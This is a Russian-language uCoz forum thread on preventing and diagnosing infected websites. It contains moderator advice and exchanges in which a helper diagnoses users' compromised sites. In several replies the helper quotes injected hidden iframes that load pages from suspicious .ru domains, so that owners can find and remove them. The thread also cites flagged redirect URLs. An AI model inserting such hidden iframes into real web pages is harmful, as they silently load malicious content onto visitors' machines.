Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Exodus
    Сообщений: 156
    Репутация: 15

    Сообщение # 2131 | 00:10:25 23 Дек 2016
    Здравствуйте! На сайте, ни с того ни с сего, в браузере гугл хром, на странице добавления материала появилось предупреждение о вредоносном ПО..
    Никаких изменений за несколько месяцев не происходило.. В чём причина не пойму!?..
    Подскажите, как определить заразу и что стоит предпринять первым делом, чтобы не улететь в бан поисковых систем..
    Прикрепления: 9217803.png (109.3 Kb)

    Бесплатно накрутить лайки, подписчиков, фолловеров, раскрутить группу
    Сообщение отредактировал Exodus - Пятница, 23 Дек 2016, 00:14:49
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2132 | 13:37:45 23 Дек 2016
    Exodus, у вас не страница добавления заблокирована, у вас весь модуль каталог сайтов с адресом dir заблокирован. ваша задача найти тот сайт, который находится в блоке у гугла и удалить его из каталога. можете попробовать войти в вебмастер в безопасность. гугл может дать подсказки. если их нет, то ищите
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Exodus
    Сообщений: 156
    Репутация: 15

    Сообщение # 2133 | 15:48:55 23 Дек 2016
    webanet, через гугл-вебмастер определил что некая страница http://resource.net.ru/dir/0-0-1-1697-20 перенаправляет на другой сайт.
    Что это за страница, откуда она взялась? Как её удалить, если я её не могу найти?

    Бесплатно накрутить лайки, подписчиков, фолловеров, раскрутить группу
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2134 | 16:57:14 23 Дек 2016
    Exodus, это ссылка-редирект на сайт. выводится кодом $SITE_URL$
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Exodus
    Сообщений: 156
    Репутация: 15

    Сообщение # 2135 | 19:05:01 23 Дек 2016
    webanet, сайт с номером 1697 отсутствует в списке.
    Скриншот с ПУ - смотреть

    Бесплатно накрутить лайки, подписчиков, фолловеров, раскрутить группу
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2136 | 20:30:18 23 Дек 2016
    Exodus, если он уже удален можете попробовать отдать сайт на пересмотр в вебмастере гугла. это на тот случай, если адрес был в комментариях в безопасности. а так у вас все ссылки на сайты идут через редирект кодом $SITE_URL$
    если конкретных указаний нет, то надо искать
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    kakttooz
    Сообщений: 16
    Репутация: 0

    Сообщение # 2137 | 21:56:06 04 Янв 2017
    Мой сайт http://igru-torrent.ru/
    Гугл пишет - Маскировка и/или скрытая переадресация На страницах этого сайта обнаружены признаки маскировки (пользователям показывается не то содержание, которое видят поисковые роботы) или переадресации пользователей на другую страницу, которая недоступна для роботов.

    Проверил сайт на rescan.pro пишет - Вставки с опасных сайтов ✖ http://go.mobstitialtag.com/notice.php?p=666940&am...<SCRIPT>

    2ip.ru пишет - На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

    Облазил всё в управлении дизайна и не чего не нашёл ....Помогите !
    фыва
    Сообщений: 2
    Репутация: 0

    Сообщение # 2138 | 19:04:38 22 Янв 2017
    webanet, сайт не открывается. Касперский предупреждает что на нем вирусы. Что с ним делать? Сайт http://school1ku.narod.ru/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2139 | 19:47:30 22 Янв 2017
    фыва, сайт заражен. заражен браузером того, кто его редактировал. менял дизайн. на сайте 80 вредоносных вставок
    попробуйте через быструю замену удалить хотя бы ифреймы
    Код
    <iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=16739" style="display: none;"></iframe>

    Код
    <iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=16739" style="display: none;"></iframe>

    но останутся длинные вредоносные скрипты, которые нужно удалять вручную. и если вы снова будете редактировать сайт зараженным браузером, вставки появятся снова
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    RoM4Ik4503
    Сообщений: 7
    Репутация: 0

    Сообщение # 2140 | 14:19:39 23 Янв 2017
    Здравствуйте! Такая же проблема как и у kakttooz, Проверил сайт на rescan.pro пишет - вставки с опасных сайтов http://mobiledevel.com/notice.php?p=679410&interstitial=1

    2ip.ru пишет - На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

    Подскажите, что можно сделать!?

    Soln
    Сообщений: 7
    Репутация: 0

    Сообщение # 2141 | 18:19:50 24 Янв 2017
    Здравствуйте! Я учитель. Выставила свой сайт на конкурс. В комментариях многие посетители пишут, что на мой сайт не даёт попасть антивирус Касперского. Что мне делать? Я захожу со своего домашнего компьютера. Всё хорошо. Работаю, добавляю материалы. Школьная администрация звонили сегодня и тоде сказали, что не могут попасть на мой сайт. Помогите,пожалуйста. Сайт shenkarenko.ucoz.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2142 | 19:08:11 24 Янв 2017
    Soln, ваш сайт заражен. в содержимом главной вредоносный код. панель управления - редактор страниц - управление страницами сайта - главная страница - напротив главной жмите на разводной ключ или карандаш - страница откроется на редактирование - перед словами достучаться до каждого сердца установлен длинный скрипт, который надо удалить и ифрейм
    Код
    <iframe id="a1996667054" src="//qxoili56p7y8i.ru/f.html" style="display: none;"></iframe>

    длинный скрипт удалять начиная с <script> и заканчивая </script>
    заражение занесено браузером
    далее предоставьте скриншот блокировки касперского
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Soln
    Сообщений: 7
    Репутация: 0

    Сообщение # 2143 | 11:27:21 26 Янв 2017
    Спасибо большое. Это получилось. Звонила сейчас в школу. В школе Касперский. Теперь мой сайт не блокируется.Но завуч говорит, что внизу странички всплывает нехорошая реклама.У меня оплачено "Премиум". Почему появляется реклама у гостей моего сайта? Помогите,пожалуйста,разобраться ещё с этим вопросом.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2144 | 16:16:56 26 Янв 2017
    Soln, у вас оплачен пакет услуг минимальный. при оплате минимального пакета часть рекламы остается, а именно идет показ рекламы внизу страницы
    оплата пакета усгу базовый полностью снимает рекламу с сайта
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Soln
    Сообщений: 7
    Репутация: 0

    Сообщение # 2145 | 17:13:31 26 Янв 2017
    Да 17.01.17 я оплатила пакет "Минимальный" и он активен до 22.02. А позже 19.01.(когда выставила сайт на конкурс) оплатила пакет "Оптимальный" и пишут ,что этот заказ ждёт активации. Значит ли это, что мне нужно отменить пакет "Минимальный", чтобы активировать "Оптимальный"? Деньги получается пропадут? Подскажите,пожалуйста.

    Добавлено (26 Янв 2017, 17:13:31)
    ---------------------------------------------
    Извините,пожалуйста. Можно ещё вопрос. Почему у меня не все фотографии отображаются на страницах сайта?

    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: